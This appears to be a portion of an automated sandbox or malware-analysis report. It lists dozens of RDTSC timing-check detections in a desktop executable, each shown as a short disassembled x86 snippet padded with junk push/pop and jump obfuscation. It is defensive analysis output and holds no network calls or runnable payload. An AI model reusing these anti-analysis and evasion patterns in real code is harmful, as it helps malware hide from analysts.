                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DAC6 second address: 63DB48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F7174BA6FE4h 0x00000010 jmp 00007F7174BA6FDFh 0x00000015 popad 0x00000016 nop 0x00000017 jno 00007F7174BA6FDCh 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 add dword ptr [ebp+12458599h], edx 0x00000026 xor dword ptr [ebp+122D2C49h], edx 0x0000002c popad 0x0000002d push 00000000h 0x0000002f add dword ptr [ebp+122D346Bh], edx 0x00000035 xchg eax, esi 0x00000036 jp 00007F7174BA6FF2h 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7174BA6FE4h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63CB7B second address: 63CB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DB48 second address: 63DB55 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DB55 second address: 63DB5F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7174CEBA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DB5F second address: 63DB65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DB65 second address: 63DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DC9B second address: 63DC9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DC9F second address: 63DCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DCA5 second address: 63DCAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640B94 second address: 640B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63ED37 second address: 63ED3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63DCAA second address: 63DD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D29ACh], esi 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F7174CEBA88h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov ebx, dword ptr [ebp+122D398Fh] 0x00000039 or edi, dword ptr [ebp+122D3066h] 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov dword ptr [ebp+122D2DEDh], ecx 0x0000004c mov eax, dword ptr [ebp+122D1679h] 0x00000052 jmp 00007F7174CEBA8Dh 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ecx 0x0000005c call 00007F7174CEBA88h 0x00000061 pop ecx 0x00000062 mov dword ptr [esp+04h], ecx 0x00000066 add dword ptr [esp+04h], 00000018h 0x0000006e inc ecx 0x0000006f push ecx 0x00000070 ret 0x00000071 pop ecx 0x00000072 ret 0x00000073 jnc 00007F7174CEBA92h 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c push esi 0x0000007d push ebx 0x0000007e pop ebx 0x0000007f pop esi 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640D4D second address: 640D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640D51 second address: 640D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642B5F second address: 642B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642B63 second address: 642B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642B69 second address: 642B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7174BA6FD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B52 second address: 643B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B57 second address: 643B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B5D second address: 643BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+1245B126h], edi 0x00000010 je 00007F7174CEBA8Bh 0x00000016 or di, F136h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F7174CEBA88h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F7174CEBA88h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 add bh, FFFFFFBEh 0x00000056 mov edi, eax 0x00000058 call 00007F7174CEBA95h 0x0000005d mov edi, dword ptr [ebp+1245B3E7h] 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push edi 0x00000069 pop edi 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644D9D second address: 644DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642D6E second address: 642D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646AD3 second address: 646AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646AD7 second address: 646B3A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7174CEBA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7174CEBA8Ch 0x0000000f popad 0x00000010 nop 0x00000011 mov di, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F7174CEBA88h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 jmp 00007F7174CEBA8Ah 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D38ABh] 0x0000003d jmp 00007F7174CEBA92h 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649875 second address: 6498EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F7174BA6FD8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F7174BA6FD8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 add ebx, 5C4E2F07h 0x00000048 jmp 00007F7174BA6FDBh 0x0000004d push 00000000h 0x0000004f je 00007F7174BA6FD6h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489D0 second address: 6489D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6498EA second address: 6498EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489D5 second address: 6489DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489DC second address: 648A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7174BA6FD8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F7174BA6FE3h 0x00000027 xor dword ptr [ebp+122D30E5h], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movsx ebx, si 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jg 00007F7174BA6FF2h 0x00000044 mov eax, dword ptr [ebp+122D1245h] 0x0000004a call 00007F7174BA6FDBh 0x0000004f mov dword ptr [ebp+1247F72Dh], edi 0x00000055 pop ebx 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edi 0x0000005b call 00007F7174BA6FD8h 0x00000060 pop edi 0x00000061 mov dword ptr [esp+04h], edi 0x00000065 add dword ptr [esp+04h], 00000014h 0x0000006d inc edi 0x0000006e push edi 0x0000006f ret 0x00000070 pop edi 0x00000071 ret 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 jns 00007F7174BA6FD6h 0x0000007d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648A95 second address: 648A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648A99 second address: 648A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6499E5 second address: 6499E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6513E8 second address: 6513F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650B44 second address: 650B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650B4A second address: 650B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650B6C second address: 650B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E26 second address: 650E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E2A second address: 650E3A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7174CEBA86h 0x00000008 jne 00007F7174CEBA86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E3A second address: 650E51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDDh 0x00000007 jo 00007F7174BA6FDEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 650E51 second address: 650E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F7174CEBA86h 0x00000012 pop esi 0x00000013 je 00007F7174CEBA92h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8520 second address: 5E852B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007F7174BA6FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E852B second address: 5E8542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnp 00007F7174CEBA8Ah 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8542 second address: 5E8546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E8546 second address: 5E8562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA96h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65780D second address: 657811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657811 second address: 657815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657815 second address: 657833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7174BA6FDFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657833 second address: 657839 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657917 second address: 65791B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65791B second address: 657925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 657925 second address: 65794B instructions: 0x00000000 rdtsc 0x00000002 je 00007F7174BA6FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e jmp 00007F7174BA6FDBh 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65794B second address: 657964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174CEBA94h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC68 second address: 65CC6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65CC6D second address: 65CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174CEBA91h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7174CEBA98h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65D6DC second address: 65D6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DAAD second address: 65DAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DC20 second address: 65DC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DC29 second address: 65DC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65DC2D second address: 65DC33 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66715C second address: 667167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667167 second address: 66716D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66716D second address: 667192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F7174CEBA97h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 667192 second address: 667196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B77B second address: 66B77F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B77F second address: 66B78F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7174BA6FD6h 0x00000008 js 00007F7174BA6FD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B78F second address: 66B794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B92F second address: 66B938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B938 second address: 66B940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B940 second address: 66B949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B949 second address: 66B94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C1FF second address: 66C205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4AA second address: 66C4B8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7174CEBA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4B8 second address: 66C4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4BE second address: 66C4D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4D2 second address: 66C4D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C4D8 second address: 66C4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67161D second address: 67162D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007F7174BA6FD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671939 second address: 67193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671A85 second address: 671AAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7174BA6FE1h 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F7174BA6FDDh 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671AAE second address: 671ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671ABB second address: 671ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BB0 second address: 671BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BB4 second address: 671BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7174BA6FDFh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BDF second address: 671BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BE3 second address: 671BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BE9 second address: 671BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnc 00007F7174CEBA86h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671BFA second address: 671C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7174BA6FE9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
